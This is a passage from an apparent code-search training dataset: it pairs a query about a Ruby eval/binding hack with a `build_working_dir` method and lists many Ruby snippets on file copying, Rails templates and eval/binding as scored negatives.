"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) +\n [File.expand_path(File.dirname(__FILE__))]\nend",
"def collect_sources_and_toolchains\n sources_to_build = {}\n\n exclude_files = Set.new\n exclude_sources.each do |p|\n if p.include?(\"..\")\n Printer.printError \"Error: Exclude source file pattern '#{p}' must not include '..'\"\n return nil\n end\n\n Dir.glob(p).each {|f| exclude_files << f}\n end\n files = Set.new # do not build the same file twice\n\n add_to_sources_to_build(sources_to_build, exclude_files, sources)\n\n source_patterns.each do |p|\n if p.include?(\"..\")\n Printer.printError \"Error: Source file pattern '#{p}' must not include '..'\"\n return nil\n end\n\n globRes = Dir.glob(p)\n if (globRes.length == 0)\n Printer.printWarning \"Warning: Source file pattern '#{p}' did not match to any file\"\n end\n add_to_sources_to_build(sources_to_build, exclude_files, globRes, tcs4source(p))\n end\n return sources_to_build\n end",
"def source_paths\n Array(super) + \n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) + \n [File.expand_path(File.dirname(__FILE__))]\nend",
"def source_paths\n Array(super) + \n [File.expand_path(File.dirname(__FILE__))]\nend",
"def copy_files\r\n %w{_config.dev.yml about.md feed.xml gulpfile.js index.html}.each do |file|\r\n copy_file file\r\n end\r\n end",
"def copy_common_templates\n %w[\n .gitignore .rspec Gemfile MIT-LICENSE Rakefile\n ].each do |tpl|\n template(\"../common/#{tpl}\", \"#{extension_name}/#{tpl}\")\n end\n end",
"def create_source_files\n empty_directory(File.join(target_dir, \"lib/kitchen/driver\"))\n\n create_template(\n \"version.rb.erb\",\n \"lib/kitchen/driver/#{name}_version.rb\"\n )\n create_template(\n \"driver.rb.erb\",\n \"lib/kitchen/driver/#{name}.rb\"\n )\n end",
"def write_static_files\n debug_msg \"Copying static files\"\n options = { :verbose => $DEBUG_RDOC, :noop => @options.dry_run }\n static_files = Pathname.\n glob(@template_dir.to_s + '/**/*').\n reject { |f| f.extname == '.erb' }\n static_files.sort.each do |source_path|\n out_path = @output_dir + source_path.relative_path_from(@template_dir)\n if source_path.directory?\n out_path.mkpath unless @options.dry_run\n else\n FileUtils.cp source_path.to_s, out_path.dirname.to_s, **options\n end\n end\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"vine-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/bmartel/vine.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{vine/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def IncludeClobberTargets(*includes)\n @ProjectFileLoader.CurrentlyLoadedProjectFile().ClobberList.include(includes)\n end",
"def includes(*paths)\n self.included_files.concat(expand_globs(paths))\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"siderail-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n YARG_REPO,\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{siderail/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def source_files(extensions)\n source_dir = Pathname.new(info[\"library\"][\"source_dir\"])\n ret = if one_point_five?\n code_files_in_recursive(source_dir, extensions)\n else\n [source_dir, source_dir + \"utility\"].map { |d| code_files_in(d, extensions) }.flatten\n end\n\n # note to future troubleshooter: some of these tests may not be relevant, but at the moment at\n # least some of them are tied to existing features\n ret.reject { |p| vendor_bundle?(p) || in_tests_dir?(p) || in_exclude_dir?(p) }\n end",
"def compile_coffeescript source_path, destination_path\n # Jasmine testing directories\n Dir.mkdir(File.dirname(File.expand_path(destination_path, __FILE__))) unless File.exists?(File.dirname(File.expand_path(destination_path, __FILE__)))\n \n # Compile coffee script from the project into the test directory\n root = File.expand_path(source_path, __FILE__)\n destination_dir = File.expand_path(destination_path, __FILE__)\n glob = File.expand_path(\"**/*.js.coffee\", root)\n Dir.glob(glob).each do |srcfile|\n srcfile = Pathname.new(srcfile)\n destfile = srcfile.sub(root, destination_dir).sub(\".coffee\", \"\")\n FileUtils.mkdir_p(destfile.dirname)\n File.open(destfile, \"w\") {|f| f.write(CoffeeScript.compile(File.new(srcfile)))}\n end\n end",
"def link_include_file(file); end",
"def link_include_file(file); end",
"def stage_copy(source_dir)\n test_dir = File.dirname(caller[0])\n stage_clear\n srcdir = File.join(test_dir, source_dir)\n Dir[File.join(srcdir, '*')].each do |path|\n FileUtils.cp_r(path, '.')\n end\n end",
"def include(source, base=nil)\n\t\t\tsource = File.join(base, source.to_s) unless base.nil?\n\t\t\t@sources << Source.new(source.to_s, type: @type)\n\t\tend",
"def copy(source_dir)\n test_dir = File.dirname(caller[0])\n stage_clear\n srcdir = File.join(test_dir, source_dir)\n Dir[File.join(srcdir, '*')].each do |path|\n FileUtils.cp_r(path, '.')\n end\n end",
"def add_files_to_project\n # add/overwrite some files\n mkdir('config/init')\n mkdir_p('lib/tasks')\n cp_r(Dir.glob('../files/*'), '.')\n # gem changed the api in version 1.3.2, I think, at least it is changed\n # in version 1.3.4, so the following merb hack is necessary for merb\n # 1.0.11\n # TODO: this should be generically performed outside of the spec2merb script\n if Versionomy.parse(`gem --version`) < Versionomy.parse('1.3.4')\n raise Exception.new 'Please upgrade rubygems to at least 1.3.4 (sudo gem update --system)'\n end\n if File.exist?('tasks/merb.thor/gem_ext_4.rb')\n rm('tasks/merb.thor/gem_ext.rb') if File.exist?('tasks/merb.thor/gem_ext.rb')\n mv('tasks/merb.thor/gem_ext_4.rb', 'tasks/merb.thor/gem_ext.rb')\n end\n end",
"def create_src_list\n\n if ENV['TM_PROJECT_DIRECTORY']\n\n src_list = (ENV['TM_AS3_USUAL_SRC_DIRS'] != nil) ? ENV['TM_AS3_USUAL_SRC_DIRS'].gsub(':','|') : \"src\"\n @src_dirs = `find -dE \"$TM_PROJECT_DIRECTORY\" -maxdepth 5 -regex '.*\\/(#{src_list})' -print 2>/dev/null`\n\n end\n\n cs = \"#{@completion_src}/data/completions\"\n\n # Check once for existence here as we will save repeated\n # checks later (whilst walking up the heirarchy).\n add_src_dir(\"#{cs}/intrinsic\")\n add_src_dir(\"#{cs}/frameworks/air\")\n add_src_dir(\"#{cs}/frameworks/flash_ide\")\n add_src_dir(\"#{cs}/frameworks/flash_cs3\")\n\n # Where we have access to the compressed flex 3 files use them,\n # otherwise go looking for the sdk.\n unless add_src_dir(\"#{cs}/frameworks/flex_3\")\n fx = FlexMate::SDK.src\n add_src_dir(fx) unless fx.nil?\n end\n\n #log_append( \"src_dirs \" + @src_dirs )\n\n end",
"def sources\n files(!p?)\n end",
"def write_source_file\n paths = []\n\n # Remove C:/\n install_dir = project.install_dir.split('/')[1..-1].join('/')\n\n # Grab all parent paths\n Pathname.new(install_dir).ascend do |path|\n paths << path.to_s\n end\n\n # Create the hierarchy\n hierarchy = paths.reverse.inject({}) do |hash, path|\n hash[File.basename(path)] = path.gsub(/[^[:alnum:]]/, '').upcase + 'LOCATION'\n hash\n end\n\n # The last item in the path MUST be named PROJECTLOCATION or else space\n # robots will cause permanent damage to you and your family.\n hierarchy[hierarchy.keys.last] = 'PROJECTLOCATION'\n\n # If the path hierarchy is > 1, the customizable installation directory\n # should default to the second-to-last item in the hierarchy. If the\n # hierarchy is smaller than that, then just use the system drive.\n wix_install_dir = if hierarchy.size > 1\n hierarchy.to_a[-2][1]\n else\n 'WINDOWSVOLUME'\n end\n\n render_template(resource_path('source.wxs.erb'),\n destination: \"#{staging_dir}/source.wxs\",\n variables: {\n name: project.package_name,\n friendly_name: project.friendly_name,\n maintainer: project.maintainer,\n hierarchy: hierarchy,\n\n wix_install_dir: wix_install_dir,\n }\n )\n end",
"def testUselessProcessesSourceFiles\n execute_Mix_WithConf({\n :WaveFiles => {\n :FilesList => [\n {\n :Name => 'Wave.wav'\n }\n ]\n },\n :Mix => {\n 'Final' => {\n :Tracks => {\n 'Wave.wav' => {\n :Processes => [\n {\n :Name => 'VolCorrection',\n :Factor => '2db'\n },\n {\n :Name => 'VolCorrection',\n :Factor => '-2db'\n }\n ]\n }\n }\n }\n }\n },\n :PrepareFiles => [\n [ 'Wave/Empty.wav', 'Wave.wav' ]\n ]) do |iStdOUTLog, iStdERRLog, iExitStatus|\n assert_exitstatus 0, iExitStatus\n assert Dir.glob('05_Mix/*.wav').empty?\n assert_wave_lnk 'Empty', '05_Mix/Final/Final.wav'\n end\n end",
"def addSrcFilesByRE(re)\n Dir.for_each(@srcDir) { |f|\n next if File.stat(f).dir?\n @files << f if re =~ f\n }\n end",
"def add_template_repository_to_source_path\n template_dir =\n if __FILE__ =~ %r{\\Ahttps?://}\n clone_repo\n else\n File.dirname(__FILE__)\n end\n\n source_paths.unshift(template_dir)\n puts \"*** source_paths: (#{source_paths.join(\" \")})\"\n puts \"*** template_dir: (#{template_dir})\"\n template_dir\nend",
"def add_template_repository_to_source_path\n template_dir =\n if __FILE__ =~ %r{\\Ahttps?://}\n clone_repo\n else\n File.dirname(__FILE__)\n end\n\n source_paths.unshift(template_dir)\n puts \"*** source_paths: (#{source_paths.join(\" \")})\"\n puts \"*** template_dir: (#{template_dir})\"\n template_dir\nend",
"def prepare_pester_tests\n info(\"Preparing to copy files from '#{suite_test_folder}' to the SUT.\")\n sandboxed_suites_path = File.join(sandbox_path, \"suites\")\n copy_if_src_exists(suite_test_folder, sandboxed_suites_path)\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/RYLabs/rails-devcontainer-template.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-devcontainer-template/(.+)/rails-postgres.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require 'tmpdir'\n source_paths.unshift(tempdir = Dir.mktmpdir('rails-templates'))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n '--quiet',\n 'https://github.com/brightoctopus/rails-templates.git',\n tempdir\n ].map(&:shellescape).join(' ')\n\n if (branch = __FILE__[%r{rails-templates/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def source_paths\n Array(super) + [__dir__]\nend",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require 'tmpdir'\n source_paths.unshift(tempdir = Dir.mktmpdir('herewego-'))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n '--quiet',\n 'https://github.com/Sanchezdav/herewego.git',\n tempdir\n ].map(&:shellescape).join(' ')\n\n if (branch = __FILE__[%r{herewego/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def copy_file(*filters)\n\t\tadd_dep filters.map{|filter| File.join(@source_dir, filter)}\n\tend",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require 'tmpdir'\n require 'fileutils'\n require 'shellwords'\n source_paths.unshift(tempdir = Dir.mktmpdir('rails-template-'))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n '--quiet',\n 'https://github.com/shota-yamashita/rails-template.git',\n tempdir\n ].map(&:shellescape).join(' ')\n\n if (branch = __FILE__[%r{rails-template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def add_vendor_files\n say_quietly \"Copying files...\"\n\n %w[auth backend frontend].each do |section|\n template \"vendor/assets/javascripts/archangel/#{section}.js\"\n template \"vendor/assets/stylesheets/archangel/#{section}.css\"\n end\n end",
"def cpp_includes\n\t\tselect {|x| x.class == CppInclude }\n\tend",
"def copy(files=[])\n files = ignore_stitch_sources files\n if files.size > 0\n begin\n message = 'copied file'\n message += 's' if files.size > 1\n UI.info \"#{@msg_prefix} #{message.green}\" unless @config[:silent]\n puts '| ' #spacing\n files.each do |file|\n if !check_jekyll_exclude(file)\n path = destination_path file\n FileUtils.mkdir_p File.dirname(path)\n FileUtils.cp file, path\n puts '|' + \" → \".green + path\n else\n puts '|' + \" ~ \".yellow + \"'#{file}' detected in Jekyll exclude, not copying\".red unless @config[:silent]\n end\n end\n puts '| ' #spacing\n\n rescue Exception\n UI.error \"#{@msg_prefix} copy has failed\" unless @config[:silent]\n UI.error e\n stop_server\n throw :task_has_failed\n end\n true\n end\n end",
"def assets_to_compile \n return @assets_to_compile if @assets_to_compile \n files = Dir.glob(prefix + \"**/*\").select {|f| File.file?(f)}\n files.collect! { |f| f.gsub(/^#{prefix}\\//, \"\") }\n end",
"def copy_skel_files(exclude = [])\n full_path = File.join(File.dirname(__FILE__), @skel)\n excluded = exclude.map {|x| \"#{full_path}/#{x}\" }\n Dir.glob(\"#{full_path}/**/*\").select {|x| File.directory?(x)}.each do |f|\n relative_path = f.gsub(/#{full_path}\\//, '')\n FileUtils.mkdir_p relative_path\n end\n (\n Dir.glob(\"#{full_path}/**/*\") + Dir.glob(\"#{full_path}/**/.*\") - excluded\n )\n .select {|x| File.file?(x)}.each do |f|\n next if f =~ /\\.gitkeep/\n relative_path = f.gsub(/#{full_path}\\//, '')\n FileUtils.cp f, relative_path\n end\n end",
"def IncludeCleanTargets(*includes)\n @ProjectFileLoader.CurrentlyLoadedProjectFile().CleanList.include(includes)\n end",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def keep_source_code_for_prebuilt_frameworks!\n DSL.dont_remove_source_code = true\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n p \"!!!!!!!!!!!!!!!!!!!!\"\n p \"!!!!!!!!!!!!!!!!!!!!\"\n p \"!!!!!!!!!!!!!!!!!!!!\"\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git :clone => [\n \"--quiet\",\n \"https://github.com/velpradeep/react-rails-template-app.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git :checkout => branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def _inter source\n c = compile source\n cifrom c\nend",
"def included_sources=(value)\n @included_sources = value\n end",
"def copy_source\n directory('webpack', self.target_path, {\n recursive: true\n })\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit {FileUtils.remove_entry(tempdir)}\n git clone: [\n \"--quiet\",\n \"https://github.com/sherllochen/rails-template.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) {git checkout: branch}\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def compile!\n new_version = generate_version\n new_abs_path = abs_path(new_version)\n return @compiled_path = current_file_path if @compile_files.empty?\n\n FileUtils.mkdir_p @min_dir unless File.exist?(@min_dir)\n js? ? compile_js!(new_abs_path) : compile_css!(new_abs_path)\n\n if not_changed?(new_abs_path, current_abs_path)\n puts \"file not changed, use current file (#{current_file_path})\"\n FileUtils.rm_rf new_abs_path\n @compiled_path = current_file_path\n else\n puts \"new file version (#{file_path(new_version)}) created\"\n @compiled_path = file_path(new_version)\n end\n end",
"def lib_files\n @files.select do |file|\n require_paths.any? do |path|\n file.start_with? path\n end\n end\n end",
"def copy_source\n copy_source_tree('source')\n return unless Dir.exist?(\"#{@build_dir}/source/debian\")\n\n FileUtils.rm_rf(Dir.glob(\"#{@build_dir}/source/debian\"))\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require 'tmpdir'\n\n source_paths.unshift(tempdir = Dir.mktmpdir(DIR_NAME + '-'))\n at_exit { FileUtils.remove_entry(tempdir) }\n run(\"git clone --quiet #{GITHUB_PATH.shellescape} #{tempdir.shellescape}\")\n\n if (branch = __FILE__[%r{#{DIR_NAME}/(.+)/bridgetown.automation.rb}, 1])\n Dir.chdir(tempdir) { system(\"git checkout #{branch}\") }\n @current_dir = File.expand_path(tempdir)\n end\n else\n source_paths.unshift(DIR_NAME)\n end\nend",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require 'tmpdir'\n source_paths.unshift(tempdir = Dir.mktmpdir('rails-template-'))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n '--quiet',\n 'https://github.com/leikir/rails-template.git',\n tempdir\n ].map(&:shellescape).join(' ')\n\n if (branch = __FILE__[%r{rails-template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def include(*files)\n @include += files.flatten\n self\n end",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"ngrok_rails_template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git clone: [\n \"--quiet\",\n \"https://github.com/captproton/ngrok_rails_template.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{ngrok_rails_template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git checkout: branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def copy_source\n copy_source_tree('source')\n return unless Dir.exist?(\"#{@build_dir}/source/debian\")\n FileUtils.rm_rf(Dir.glob(\"#{@build_dir}/source/debian\"))\n end",
"def execute\n\n copiedCounter = 0\n failedCounter = 0\n skippedCounter = 0\n \n # traverse all srcfiles\n FiRe::filesys.find(@source) { |srcItem|\n \n # give some feedback\n FiRe::log.info \"searching #{srcItem}...\" if FiRe::filesys.directory?(srcItem)\n \n # skip this subtree if it matches ignored-items\n FiRe::filesys.prune if ignore?(srcItem) \n \n # transform srcpath to destpath\n destItem = srcItem.gsub(@source, @destination)\n\n # do not copy if item already exists and looks OK\n if needCopy(destItem,srcItem)\n copyWentWell = copyItem(srcItem, destItem)\n copiedCounter += 1 if copyWentWell\n failedCounter += 1 if !copyWentWell\n else\n skippedCounter += 1 \n end\n \n }\n \n # give some feedback\n FiRe::log.info \"copied #{copiedCounter} items, while #{failedCounter} items failed. #{skippedCounter} items did not need to be copied today.\"\n\n end",
"def move_files_if(src_files, dst_dir = nil)\n Dir[src_files].each do |srcfile|\n cp_action = 0\n dst_dir = File.dirname(src_files).gsub(TMPDIR, '').gsub(/^\\//, '') if dst_dir == nil\n dst_dir << \"/\" unless dst_dir =~ /\\/$/\n dstfile = \"#{dst_dir}#{File.basename(srcfile)}\"\n\n # check if exists similar one in hdl/ directory\n if !File.file? dstfile\n cp_action = 1\n # if exists but differs\n elsif !FileUtils.identical?(dstfile, srcfile) then\n \n puts \"-\" * 43 << \"existing one\" << \"-\" * 44 << '|' << \"-\" * 44 << \"generated\" << \"-\" * 43 << \"\\n\" \n puts %x{diff -y -W200 #{dstfile} #{srcfile} | less }\n puts \"-\" * 200\n print \"Use generated file #{File.basename(srcfile)}? [Y/N] \"\n if $stdin.gets =~ /y/i\n cp_action = 2\n end\n end\n if cp_action > 0\n FileUtils.mkdir_p(dst_dir) unless File.directory? dst_dir\n FileUtils.cp srcfile, dstfile\n if cp_action == 1\n printf(\"%5s %20s %s\\n\",\"\", \" new file added:\", dstfile)\n else\n printf(\"%20s %s\\n\",\" overwrited:\", dstfile)\n end\n end\n end\nend"
] |
[
"0.67724407",
"0.67555416",
"0.6641602",
"0.6449673",
"0.64423573",
"0.62240994",
"0.6183724",
"0.61246365",
"0.60495454",
"0.60196936",
"0.5957298",
"0.5891985",
"0.5861465",
"0.5851464",
"0.5845209",
"0.5845209",
"0.5802774",
"0.5775919",
"0.5772304",
"0.5753653",
"0.57510734",
"0.57510734",
"0.57510734",
"0.57510734",
"0.5746681",
"0.5740522",
"0.57154465",
"0.57028556",
"0.56908774",
"0.5631118",
"0.5598227",
"0.5586816",
"0.5586086",
"0.5569788",
"0.55472755",
"0.5530377",
"0.5525126",
"0.5525126",
"0.5525126",
"0.5525126",
"0.5525126",
"0.5525126",
"0.55192375",
"0.55191994",
"0.55191994",
"0.55191994",
"0.55188227",
"0.5514686",
"0.5498889",
"0.5497935",
"0.54946816",
"0.54934716",
"0.5482614",
"0.5482445",
"0.5482264",
"0.5476146",
"0.5461472",
"0.5461472",
"0.5458605",
"0.54567087",
"0.5447649",
"0.54470086",
"0.54445493",
"0.54434556",
"0.54419094",
"0.541466",
"0.541208",
"0.54082006",
"0.54082006",
"0.5399759",
"0.53975713",
"0.5395501",
"0.53943926",
"0.53939366",
"0.53859156",
"0.53835857",
"0.5381881",
"0.53799015",
"0.5378647",
"0.53713346",
"0.536134",
"0.53608924",
"0.5356689",
"0.5354662",
"0.53545934",
"0.5351937",
"0.53500986",
"0.5349617",
"0.53485966",
"0.5347694",
"0.5347208",
"0.53468096",
"0.5345108",
"0.5344331",
"0.53434837",
"0.53426576",
"0.53426117",
"0.5338031",
"0.5335797",
"0.5333946"
] |
0.7868463
|
0
|
Cool little eval / binding hack, from need.rb
|
def build_working_dir(&block)
file_name =
if block.respond_to?(:source_location)
block.source_location[0]
else
eval("__FILE__", block.binding)
end
@working_dir = File.expand_path(
File.join(File.dirname(file_name), "generated"))
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def foo2 my_binding\n eval \"x\", my_binding\nend",
"def foo my_binding\n x = 200\n eval \"x\", my_binding\nend",
"def eval_binding(args, current_cont)\n\t\t\tname, env = args[:name], args[:env]\n\t\t\tif env.include? name.val.to_sym\n\t\t\t\treturn current_cont.next_with(ast: env[name.val.to_sym])\n\t\t\telse\n\t\t\t\tif env.parent\n\t\t\t\t\t# TODO: check if copy_with is necessary\n\t\t\t\t\treturn current_cont.with name: name, env: env.parent\n\t\t\t\telse\n\t\t\t\t\treturn current_cont.heap[:error_handler].with message: \n\t\t\t\t\t\t\"Could not resolve symbol #{name.val.inspect}\",\n\t\t\t\t\t\tast: name, backtrace: caller(0)\n\t\t\t\tend\n\t\t\tend\n\t\tend",
"def bound_eval(source)\n self.generate_binding.eval source\n end",
"def evaluator(str,binding)\n a_value = 123\n eval(str,binding) #outputs 321\nend",
"def __eval_binding\n RUBY_VERSION < \"1.9\" ? binding : ::Kernel.binding\n end",
"def eval(*args); end",
"def eval(string, binding=nil, filename=nil, lineno=1)\n if binding\n if binding.kind_of? Proc\n binding = binding.binding\n elsif binding.respond_to? :to_binding\n binding = binding.to_binding\n end\n\n unless binding.kind_of? Binding\n raise ArgumentError, \"unknown type of binding\"\n end\n\n # shortcut for checking for a local in a binding!\n # This speeds rails up quite a bit because it uses this in rendering\n # a view A LOT.\n #\n # Rails always does this passing in a binding, so thats why the check\n # is here.\n #\n # TODO eval the AST rather than compiling. Thats slightly slower than\n # this, but handles infinitely more cases.\n=begin\n if m = /^\\s*defined\\? ([a-z_][A-Za-z0-9_]*)\\s*$/.match(string)\n local = m[1].to_sym\n if binding.variables.local_defined?(local)\n return \"local-variable\"\n else\n return nil\n end\n end\n=end\n\n filename ||= binding.static_scope.active_path\n passed_binding = true\n else\n binding = Binding.setup(Rubinius::VariableScope.of_sender,\n Rubinius::CompiledMethod.of_sender,\n Rubinius::StaticScope.of_sender)\n\n filename ||= \"(eval)\"\n passed_binding = false\n end\n\n cm = Rubinius::Compiler.compile_eval string, binding.variables, filename, lineno\n\n cm.scope = binding.static_scope.dup\n cm.name = :__eval__\n\n # This has to be setup so __FILE__ works in eval.\n script = Rubinius::CompiledMethod::Script.new(cm, filename, true)\n script.eval_binding = binding\n script.eval_source = string\n\n cm.scope.script = script\n\n be = Rubinius::BlockEnvironment.new\n be.under_context binding.variables, cm\n\n # Pass the BlockEnvironment this binding was created from\n # down into the new BlockEnvironment we just created.\n # This indicates the \"declaration trace\" to the stack trace\n # mechanisms, which can be different from the \"call trace\"\n # in the case of, say: eval(\"caller\", a_proc_instance)\n if binding.from_proc?\n be.proc_environment = binding.proc_environment\n end\n\n be.from_eval!\n \n yield cm, be if block_given?\n\n if passed_binding\n be.call\n else\n be.call_on_instance(self)\n end\n end",
"def binding() end",
"def binding() end",
"def eval(expr, *rest) end",
"def _binding() binding end",
"def _binding() binding end",
"def eval(ctx: nil, **kwargs)\n ctx ||= Context.default\n bind(ctx, kwargs).forward\n end",
"def silent_eval(str, binding = T.unsafe(nil)); end",
"def get_binding(str)\n binding\nend",
"def result(_binding=TOPLEVEL_BINDING)\n eval @src, _binding\n end",
"def result(_binding=TOPLEVEL_BINDING)\n eval @src, _binding\n end",
"def bind; binding() end",
"def _target\r\n Binding.of_caller do |b|\r\n assert_equal \"foo\", b[:x]\r\n assert_equal 33, b[:y]\r\n assert_equal ['x', 'y'], b.local_variables.sort\r\n assert_equal \"foo!\", b.eval('x + y.chr')\r\n b[:x].upcase!\r\n b[:y] *= -1\r\n assert_equal \"FOO\", b[:x]\r\n assert_equal -33, b[:y]\r\n assert_equal 'local-variable', b.defined?(:y)\r\n assert_equal nil, b.defined?(:foobar)\r\n end\r\n end",
"def _eval(exp, env)\n if list?(exp)\n if special_form?(exp)\n eval_special_form(exp, env) # [:lam, [:x, :y], [:+, :x, :y]], {} => [:closure, [:x, :y], [:+, :x, :y], {}]\n else\n fun = _eval(car(exp), env) # [[:lam, [:x, :y], [:+, :x, :y]], 3, 2] => [:closure, [:x, :y], [:+, :x, :y], {}]\n args = eval_list(cdr(exp), env) # [[:lam, [:x, :y], [:+, :x, :y]], 3, 2] => [3, 2]\n apply(fun, args) # [:closure, [:x, :y], [:+, :x, :y], {}], [3, 2] =>\n end\n else # exp := :x or :+ or 1\n if immediate_val?(exp) # 1\n exp\n else # :x or :+\n e = lookup_primitive_fun(exp) || lookup_var(exp, env)\n # :+ => [:prim, lambda { |x,y| x + y }]\n # :x, {x: 1, y: 2} => 1\n end\n end\nend",
"def _eval(m, env)\n\t\t@count+=1\n\t\tif m.is_a? Symbol\n\t\t\treturn env[m]\n \t\telsif !m.is_a? Array\n \t\t\treturn m\n \t\tend\n\t\tcase m[0]\n\t\twhen :lambda\n\t\t\t__, x, m1 = m[0], [m[1]], [m[2]]\n\t\t\tProc.new{|*clos| _eval(m1, Env.new(x, clos, env))}\n\t\telse\n\t\t\texprs = m.map { |expr| _eval(expr, env)}\n\t\t\treturn exprs[0] if !exprs[0].is_a? Proc\n\t\t\texprs[0].call(*exprs[1..-1])\n\t\tend\n\tend",
"def eval(_)\n value\n end",
"def create_binding(variable_to_value_hash) \n current_binding = binding\n for variable in variable_to_value_hash.keys\n eval \"#{variable.to_s} = variable_to_value_hash[variable]\", binding\n current_binding = binding\n end\n current_binding\nend",
"def get_a_binding\n val = 123\n binding\nend",
"def get_a_binding\n\tval = 123\n\tbinding\nend",
"def _run (expr)\n _ruby_eval expr\n end",
"def eval(string, binding=nil, filename=\"(eval)\", lineno=1)\n if !binding\n binding = Binding.setup(VariableScope.of_sender,\n CompiledMethod.of_sender,\n StaticScope.of_sender)\n\n elsif binding.__kind_of__ Proc\n binding = binding.binding\n elsif !binding.__kind_of__ Binding\n raise ArgumentError, \"unknown type of binding\"\n end\n\n context = Compiler::Context.new binding.variables, binding.code\n\n compiled_method = Compiler::Utils.compile_string string, context, filename, lineno\n compiled_method.scope = binding.static_scope\n compiled_method.name = :__eval__\n\n yield compiled_method if block_given?\n\n # This has to be setup so __FILE__ works in eval.\n script = CompiledMethod::Script.new\n script.path = filename\n compiled_method.scope.script = script\n\n # Internalize it now, since we're going to springboard to it as a block.\n compiled_method.compile\n\n be = BlockEnvironment.new\n be.under_context binding.variables, compiled_method\n\n # Pass the BlockEnvironment this binding was created from\n # down into the new BlockEnvironment we just created.\n # This indicates the \"declaration trace\" to the stack trace\n # mechanisms, which can be different from the \"call trace\"\n # in the case of, say: eval(\"caller\", a_proc_instance)\n if binding.from_proc? then\n be.proc_environment = binding.proc_environment\n end\n\n be.from_eval!\n be.call\n end",
"def f\n x = 3\n b = binding()\n b\nend",
"def local_binding\n binding\n end",
